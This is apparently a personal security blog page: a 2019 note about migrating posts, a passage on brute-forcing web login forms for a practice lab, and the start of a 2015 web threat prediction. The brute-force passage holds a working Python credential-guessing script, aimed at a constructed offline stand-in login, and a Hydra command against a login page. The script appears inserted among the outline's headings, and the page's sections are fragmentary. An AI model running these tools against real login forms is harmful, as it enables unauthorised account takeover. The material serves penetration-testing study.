Rant from The Past & the Present Updates – 2019

2016

2017

2018

2019 ..

Alright, back to the desk again from the past.

I have been busy for quite some time now & had to make various research available for reference. I had put up https://pwntoken.github.io for this very reason; however, it now takes tremendous effort to maintain the platform (Octopress), as most of its developers have stopped supporting it.

Having pointed that out, I've decided to migrate all my research posts to the WordPress platform, fixing the images where required, & to continue maintaining this space. It's been a jerky ride, & all the posts from the past had been recorded solely for my own tracking & reference; however, they could be useful to other content assessors.

It's 2019! A whole lot has been at the desk to record & put across the table. The blog shall no longer contain any references to personal academic records. However, I plan to record security research content along with the migration, which should be possible after a lot of effort invested in fixing missing images, hyperlinks, etc. The year 2019 & the years before it, where I left off, have seen more security landscape changes, shift-left approaches & a ton of interesting security techniques to cover, including but not limited to:

  1. Agile Based Application Security
  2. IoT Security being pushed to the Edge
  3. Salesforce Penetration Testing
  4. Sharepoint Security Testing
  5. IPTV Security Assessments
  6. New Security Attack vectors

Since security in itself has wide coverage & various inter-related domains, I shall retain the Application Security content as it is at present while I work on the rest & phase them out for release.

Other transforms:
  1. A new look – I intend to make the blog easier to use for reference purposes, with a few glitches still to be fixed.
  2. Optimized experience for commenters & faster response times to questions asked.
  3. I shall probably also try including polls on certain posts which require opinions.
  4. Active blogging on security research content & daily (or weekly) posts on the new learning front.

I look forward to continuing with the content, as I intend to track all my records, & that should be the entire point of the blog.

Readers are welcome to use the content with prior consent & due credit where required.

- Shritam Bhowmick
Application Security Research (http://www.pwntoken.github.io/)
                              (http://www.pwntoken.wordpress.com/)

Breaking the Application with Shritam Bhowmick – Application Bruteforce Demystified.

Web Form Brute Force Methods

Demonstration by Shritam Bhowmick
Web Application Penetration Tester
Independent Consulting Security Evangelist

Abstract

This is a set of web application penetration testing challenges hosted at pentesteracademylab.appspot.com; it offers several challenges for web application security researchers to break in a safe environment. This is for lab practice only, and no part of this document was provided by the original authors. Having pulled out my old research on application security, I thought to give back to the community, though not all releases are meant to be pushed here. This research is part of my private application security research and proudly serves as an opening for others to dwell on and work further on the same, as provided, as long as the original authors are credited.

Contents

Hack.
Method 1: Using Hydra to Brute Force Web Logins
Method 2: Using Burp Suite Intruder to Brute Force Web Logins

Method 3: Using Python to break Web-Form Login
Method 4: Using WebSlayer to Brute Force Web Logins
Method 5: Nmap Script Code to break web form
Contact Information.
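Every method in the list above, whether Hydra, Burp Intruder, a script, WebSlayer or an Nmap NSE script, comes down to the same two things: submit the form for each candidate pair, and decide from the response whether the guess worked. The second step is where testers get false positives, so the added example below (written for this page, not the author's original script) puts the classification in one place. The login form it talks to is a constructed in-process stand-in for a PHP-style login (the `username`/`password` fields, the `Invalid username or password` banner and the `PHPSESSID` cookie are assumptions so the script runs offline); against a real lab target you would replace `fake_login_endpoint` with a function that POSTs the body over HTTP and returns a `Response`.

```python
"""Web-form brute forcing with explicit success/failure classification.

Added example for this post, not the author's original script. The login
form below is a constructed in-process stand-in so the script runs offline;
swap `post` for a real HTTP client to use it against a lab target."""
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Optional, Tuple
from urllib.parse import parse_qs, urlencode


@dataclass
class Response:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


# --- Constructed stand-in for a PHP-style login form (assumption, not a real site) ---
_FAKE_USERS = {"admin": "Winter2019!", "jsmith": "password1"}
FAIL_MARKER = "Invalid username or password"


def fake_login_endpoint(form_body: str) -> Response:
    """Behaves like many login handlers: 302 plus a session cookie on success,
    200 with an error banner on failure."""
    fields = parse_qs(form_body)
    user = fields.get("username", [""])[0]
    password = fields.get("password", [""])[0]
    if _FAKE_USERS.get(user) == password:
        return Response(302, {"Location": "/dashboard.php",
                              "Set-Cookie": "PHPSESSID=deadbeef; HttpOnly"})
    return Response(200, {}, f"<p class='error'>{FAIL_MARKER}</p>")


# --- Brute forcer ---
def classify(resp: Response, fail_marker: str,
             success_marker: Optional[str] = None) -> str:
    """Map a response to 'success', 'fail', 'throttled' or 'unknown'.

    Same idea as Hydra's F= / S= options, with one difference that matters
    in practice: a response matching neither marker is 'unknown', not
    'success'. A WAF block page or a 500 also lacks the failure text, and
    counting it as a hit is the classic false positive of marker matching."""
    if resp.status == 429 or "Retry-After" in resp.headers:
        return "throttled"          # lockout / rate limit: stop, don't burn the account
    if fail_marker in resp.body:
        return "fail"
    if success_marker is not None:
        return "success" if success_marker in resp.body else "unknown"
    if resp.status in (301, 302, 303, 307) and "Set-Cookie" in resp.headers:
        return "success"            # redirect with a fresh session is the usual tell
    return "unknown"


def brute_force(post: Callable[[str], Response],
                usernames: Iterable[str], passwords: Iterable[str],
                fail_marker: str = FAIL_MARKER,
                success_marker: Optional[str] = None
                ) -> Tuple[List[Tuple[str, str]], List[Tuple[str, str, int]]]:
    """Try every username/password pair; return (hits, unknowns).

    `unknowns` lists guesses whose response could not be classified, for
    manual review in the proxy rather than silent acceptance."""
    passwords = list(passwords)
    hits, unknowns = [], []
    for user in usernames:
        for pw in passwords:
            body = urlencode({"username": user, "password": pw, "submit": "Login"})
            resp = post(body)
            verdict = classify(resp, fail_marker, success_marker)
            if verdict == "throttled":
                raise RuntimeError(f"target is throttling after user={user!r}; back off")
            if verdict == "unknown":
                unknowns.append((user, pw, resp.status))
            elif verdict == "success":
                hits.append((user, pw))
                break               # one valid password per user is enough; move on
    return hits, unknowns


if __name__ == "__main__":
    users = ["admin", "jsmith", "nobody"]          # constructed sample input
    wordlist = ["123456", "password1", "Winter2019!"]
    found, review = brute_force(fake_login_endpoint, users, wordlist)
    print("valid credentials:", found)
    print("needs manual review:", review)
```

The `fail_marker` argument plays the role of Hydra's `F=` string (`hydra -l admin -P words.txt host http-post-form "/login.php:username=^USER^&password=^PASS^:F=Invalid username or password"` is the equivalent invocation); the `unknown` verdict and the stop on 429/`Retry-After` are the two checks that module does not do for you, and the first is what separates a real hit from a WAF block page when you later eyeball Intruder's response lengths.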


Web Security Threat Prediction

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Abstract

The web security scene has become more complex than ever, and it is time for the various industries to take a deeper look at it and grasp the gravity of a situation which affects them directly or indirectly. It can come as a blow and won't announce itself until it's too late. This post will walk you through recent predictions in terms of web security, inform you about the latest web attacks on the rise, and show how such attacks are bad for business and reputation, let alone the financial losses. When we talk about industry, this doesn't have to mean the retail industry; it stretches from medical appliances to car manufacturing and all the way down to the electronic cigarette industry. That being said, we will look at how various industrial assets which have had, and continue to have, a presence on the web are affected directly or indirectly, and why web security is an absolutely important factor for them, too big a risk to ignore or compromise on.

Prediction 2015

I have carried out a statistical background check on as many application attack vectors as possible, and from that statistical approach have arrived at a very conclusive set of industries which could face bankruptcy as well as reputation loss if the web security part is ignored. Here are some of the industries on which ignoring web security at their end has a direct business impact.

  • Medical Department
  • Web Retail Department and Business Assets
  • Opensource Platforms
  • Mobile Devices
